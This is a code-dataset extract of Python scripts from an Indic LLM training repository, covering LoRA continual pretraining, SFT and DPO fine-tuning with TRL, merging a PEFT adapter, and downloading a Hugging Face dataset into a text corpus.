logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,345 | Python | .py | 574 | 40.578397 | 200 | 0.647091 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,529 | pretrain.py | adithya-s-k_Indic-llm/indic_llm/continual_pretrain/pretrain.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
logger.info(f'training datasets-{filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = LlamaForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 20,961 | Python | .py | 407 | 42.432432 | 119 | 0.656131 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,530 | SFT_finetune.py | adithya-s-k_Indic-llm/scripts/SFT_finetune.py | # Copyright 2023 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# regular:
python examples/scripts/sft.py \
--model_name_or_path="facebook/opt-350m" \
--report_to="wandb" \
--learning_rate=1.41e-5 \
--per_device_train_batch_size=64 \
--gradient_accumulation_steps=16 \
--output_dir="sft_openassistant-guanaco" \
--logging_steps=1 \
--num_train_epochs=3 \
--max_steps=-1 \
--push_to_hub \
--gradient_checkpointing \
# peft:
python examples/scripts/sft.py \
--model_name_or_path="facebook/opt-350m" \
--report_to="wandb" \
--learning_rate=1.41e-5 \
--per_device_train_batch_size=64 \
--gradient_accumulation_steps=16 \
--output_dir="sft_openassistant-guanaco" \
--logging_steps=1 \
--num_train_epochs=3 \
--max_steps=-1 \
--push_to_hub \
--gradient_checkpointing \
--use_peft \
--lora_r=64 \
--lora_alpha=16
"""
from dataclasses import dataclass, field
import torch
from datasets import load_dataset
from tqdm import tqdm
from transformers import AutoTokenizer, HfArgumentParser, TrainingArguments
from trl import ModelConfig, SFTTrainer, get_kbit_device_map, get_peft_config, get_quantization_config
tqdm.pandas()
@dataclass
class ScriptArguments:
dataset_name: str = field(default="timdettmers/openassistant-guanaco", metadata={"help": "the dataset name"})
dataset_text_field: str = field(default="text", metadata={"help": "the text field of the dataset"})
max_seq_length: int = field(default=512, metadata={"help": "The maximum sequence length for SFT Trainer"})
if __name__ == "__main__":
parser = HfArgumentParser((ScriptArguments, TrainingArguments, ModelConfig))
args, training_args, model_config = parser.parse_args_into_dataclasses()
training_args.gradient_checkpointing_kwargs = dict(use_reentrant=False)
################
# Model & Tokenizer
################
torch_dtype = (
model_config.torch_dtype
if model_config.torch_dtype in ["auto", None]
else getattr(torch, model_config.torch_dtype)
)
quantization_config = get_quantization_config(model_config)
model_kwargs = dict(
revision=model_config.model_revision,
trust_remote_code=model_config.trust_remote_code,
attn_implementation=model_config.attn_implementation,
torch_dtype=torch_dtype,
use_cache=False if training_args.gradient_checkpointing else True,
device_map=get_kbit_device_map() if quantization_config is not None else None,
quantization_config=quantization_config,
)
tokenizer = AutoTokenizer.from_pretrained(model_config.model_name_or_path, use_fast=True)
tokenizer.pad_token = tokenizer.eos_token
################
# Dataset
################
raw_datasets = load_dataset(args.dataset_name)
train_dataset = raw_datasets["train"]
eval_dataset = raw_datasets["test"]
################
# Training
################
trainer = SFTTrainer(
model=model_config.model_name_or_path,
model_init_kwargs=model_kwargs,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
dataset_text_field="text",
max_seq_length=args.max_seq_length,
tokenizer=tokenizer,
packing=True,
peft_config=get_peft_config(model_config),
)
trainer.train()
trainer.save_model(training_args.output_dir) | 3,992 | Python | .py | 103 | 34 | 113 | 0.688241 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,531 | DPO_finetune.py | adithya-s-k_Indic-llm/scripts/DPO_finetune.py | # Copyright 2023 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# regular:
python examples/scripts/dpo.py \
--model_name_or_path=gpt2 \
--per_device_train_batch_size 4 \
--max_steps 1000 \
--learning_rate 1e-3 \
--gradient_accumulation_steps 1 \
--logging_steps 10 \
--eval_steps 500 \
--output_dir="dpo_anthropic_hh" \
--warmup_steps 150 \
--report_to wandb \
--bf16 \
--logging_first_step \
--no_remove_unused_columns
# peft:
python examples/scripts/dpo.py \
--model_name_or_path=gpt2 \
--per_device_train_batch_size 4 \
--max_steps 1000 \
--learning_rate 1e-3 \
--gradient_accumulation_steps 1 \
--logging_steps 10 \
--eval_steps 500 \
--output_dir="dpo_anthropic_hh" \
--optim rmsprop \
--warmup_steps 150 \
--report_to wandb \
--bf16 \
--logging_first_step \
--no_remove_unused_columns \
--use_peft \
--lora_r=16 \
--lora_alpha=16
"""
from dataclasses import dataclass, field
from typing import Dict, Optional
import torch
from datasets import Dataset, load_dataset
from transformers import AutoModelForCausalLM, AutoTokenizer, HfArgumentParser, TrainingArguments
from trl import DPOTrainer, ModelConfig, get_kbit_device_map, get_peft_config, get_quantization_config
@dataclass
class ScriptArguments:
beta: float = field(default=0.1, metadata={"help": "the beta parameter for DPO loss"})
max_length: int = field(default=512, metadata={"help": "max length of each sample"})
max_prompt_length: int = field(default=128, metadata={"help": "max length of each sample's prompt"})
max_target_length: int = field(
default=128, metadata={"help": "Only used for encoder decoder model. Max target of each sample's prompt"}
)
sanity_check: bool = field(default=True, metadata={"help": "only train on 1000 samples"})
ignore_bias_buffers: bool = field(
default=False,
metadata={
"help": "debug argument for distributed training;"
"fix for DDP issues with LM bias/mask buffers - invalid scalar type,`inplace operation. See"
"https://github.com/huggingface/transformers/issues/22482#issuecomment-1595790992"
},
)
generate_during_eval: bool = field(default=False, metadata={"help": "Generate during evaluation"})
def extract_anthropic_prompt(prompt_and_response):
"""Extract the anthropic prompt from a prompt and response pair."""
search_term = "\n\nAssistant:"
search_term_idx = prompt_and_response.rfind(search_term)
assert search_term_idx != -1, f"Prompt and response does not contain '{search_term}'"
return prompt_and_response[: search_term_idx + len(search_term)]
def get_hh(split: str, sanity_check: bool = False, silent: bool = False, cache_dir: Optional[str] = None) -> Dataset:
"""Load the Anthropic Helpful-Harmless dataset from Hugging Face and convert it to the necessary format.
The dataset is converted to a dictionary with the following structure:
{
'prompt': List[str],
'chosen': List[str],
'rejected': List[str],
}
Prompts should be structured as follows:
\n\nHuman: <prompt>\n\nAssistant:
Multiple turns are allowed, but the prompt should always start with \n\nHuman: and end with \n\nAssistant:.
"""
dataset = load_dataset("Anthropic/hh-rlhf", split=split, cache_dir=cache_dir)
if sanity_check:
dataset = dataset.select(range(min(len(dataset), 1000)))
def split_prompt_and_responses(sample) -> Dict[str, str]:
prompt = extract_anthropic_prompt(sample["chosen"])
return {
"prompt": prompt,
"chosen": sample["chosen"][len(prompt) :],
"rejected": sample["rejected"][len(prompt) :],
}
return dataset.map(split_prompt_and_responses)
if __name__ == "__main__":
parser = HfArgumentParser((ScriptArguments, TrainingArguments, ModelConfig))
args, training_args, model_config = parser.parse_args_into_dataclasses()
################
# Model & Tokenizer
################
torch_dtype = (
model_config.torch_dtype
if model_config.torch_dtype in ["auto", None]
else getattr(torch, model_config.torch_dtype)
)
quantization_config = get_quantization_config(model_config)
model_kwargs = dict(
revision=model_config.model_revision,
trust_remote_code=model_config.trust_remote_code,
attn_implementation=model_config.attn_implementation,
torch_dtype=torch_dtype,
use_cache=False if training_args.gradient_checkpointing else True,
device_map=get_kbit_device_map() if quantization_config is not None else None,
quantization_config=quantization_config,
)
model = AutoModelForCausalLM.from_pretrained(model_config.model_name_or_path, **model_kwargs)
peft_config = get_peft_config(model_config)
if peft_config is None:
model_ref = AutoModelForCausalLM.from_pretrained(model_config.model_name_or_path, **model_kwargs)
else:
model_ref = None
tokenizer = AutoTokenizer.from_pretrained(model_config.model_name_or_path)
if tokenizer.pad_token is None:
tokenizer.pad_token = tokenizer.eos_token
if args.ignore_bias_buffers:
# torch distributed hack
model._ddp_params_and_buffers_to_ignore = [
name for name, buffer in model.named_buffers() if buffer.dtype == torch.bool
]
################
# Dataset
################
train_dataset = get_hh("train", sanity_check=args.sanity_check)
eval_dataset = get_hh("test", sanity_check=args.sanity_check)
################
# Training
################
trainer = DPOTrainer(
model,
model_ref,
args=training_args,
beta=args.beta,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
tokenizer=tokenizer,
max_length=args.max_length,
max_target_length=args.max_target_length,
max_prompt_length=args.max_prompt_length,
generate_during_eval=args.generate_during_eval,
peft_config=get_peft_config(model_config),
)
trainer.train()
trainer.save_model(training_args.output_dir) | 6,789 | Python | .py | 161 | 36.478261 | 117 | 0.678264 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,532 | merge_lora.py | adithya-s-k_Indic-llm/scripts/merge_lora.py | import argparse
import logging
import torch
from datasets import Dataset
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
def merge_adapter(base_model_path, target_model_path, adapter_path):
logger.info("Loading adapter...")
model = AutoModelForCausalLM.from_pretrained(
base_model_path,
torch_dtype=torch.float16,
low_cpu_mem_usage=True,
trust_remote_code=True,
)
model = PeftModel.from_pretrained(model, adapter_path)
tokenizer = AutoTokenizer.from_pretrained(
base_model_path,
trust_remote_code=True,
)
model = model.merge_and_unload()
logger.info("Saving target model...")
model.save_pretrained(target_model_path)
tokenizer.save_pretrained(target_model_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Merge a PEFT adapter with a base model"
)
parser.add_argument(
"--base_model_path", required=True, help="Path to the base model"
)
parser.add_argument(
"--target_model_path", required=True, help="Path to save the target model"
)
parser.add_argument(
"--adapter_path", required=True, help="Path to the adapter model"
)
args = parser.parse_args()
try:
merge_adapter(
base_model_path=args.base_model_path,
target_model_path=args.target_model_path,
adapter_path=args.adapter_path,
)
except Exception as e:
logger.error(f"Failed to merge adapter weights: {e}") | 1,717 | Python | .py | 50 | 28.5 | 82 | 0.678938 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,533 | download_dataset.py | adithya-s-k_Indic-llm/scripts/download_dataset.py | import sys
import os
import json
import shutil
import logging
import argparse
from tqdm import tqdm
import pandas as pd
from datasets import load_dataset
from dataclasses import asdict
from pathlib import Path
wd = Path(__file__).parent.parent.resolve()
sys.path.append(str(wd))
from indic_llm.dataset import download_dataset, download_convert_to_txt
from indic_llm import print_indic_llm_text_art
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
class DownloadDataset():
def __init__(self) -> None:
pass
def run(self):
parser = argparse.ArgumentParser(
description="Download Hugging Face dataset."
)
parser.add_argument(
"--hf-dataset",
required=True,
help="Name of the Hugging Face dataset (e.g., 'imdb').",
)
parser.add_argument(
"--hf-subset",
required=False,
help="Name of the path to language inside the dataset"
)
parser.add_argument(
"--dataset-split",
default="train",
help="Dataset split to use (default: 'train').",
)
parser.add_argument(
"--generate-corpus",
type=bool,
required=False,
default = False,
help="Generate text corpus from the dataset"
)
parser.add_argument(
"--text-column",
type=str,
required=False,
default="text",
help="the text column of the dataset to concatenate and create the text corpus"
)
parser.add_argument(
"--output-file-name",
type=str,
required=False,
default="text",
help="name of the output corpus text file formate: {input_file_name}.txt"
)
parser.add_argument(
"--output-dir",
type=str,
required=False,
default="./corpus",
help="name of the output directory where you want to save text corpus"
)
args = parser.parse_args()
# Initialize logger with appropriate log level
# Log parsed arguments
logger.info("Parsed arguments:")
for arg, value in vars(args).items():
logger.info(f"{arg}: {value}")
print_indic_llm_text_art()
logger.setLevel(logging.INFO)
# if generate corpus is true
# verify is generate_corpus is boolean (default: False)
# assert args.generate_corpus is bool, "--generate-corpus should be True or False"
if args.generate_corpus == True:
assert args.text_column != "", "Text column must not be empty"
assert args.output_file_name != "", "Output file name must not be empty"
assert args.output_file_name.endswith(".txt"), "Output file name should end with '.txt'"
download_convert_to_txt(
args.hf_dataset,
args.hf_subset,
args.dataset_split,
args.text_column,
args.output_file_name,
args.output_dir
)
# if generate corpus is false
elif args.generate_corpus == False:
download_dataset(
args.hf_dataset,
args.hf_subset,
args.dataset_split
)
else:
logger.error("Invalid input for --generate_corpus. Use 'True' or 'False'.")
if __name__ == "__main__":
download_dataset = DownloadDataset()
download_dataset.run() | 3,701 | Python | .py | 105 | 25.295238 | 100 | 0.577628 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,534 | tokenizer.py | adithya-s-k_Indic-llm/scripts/tokenizer.py | import sys
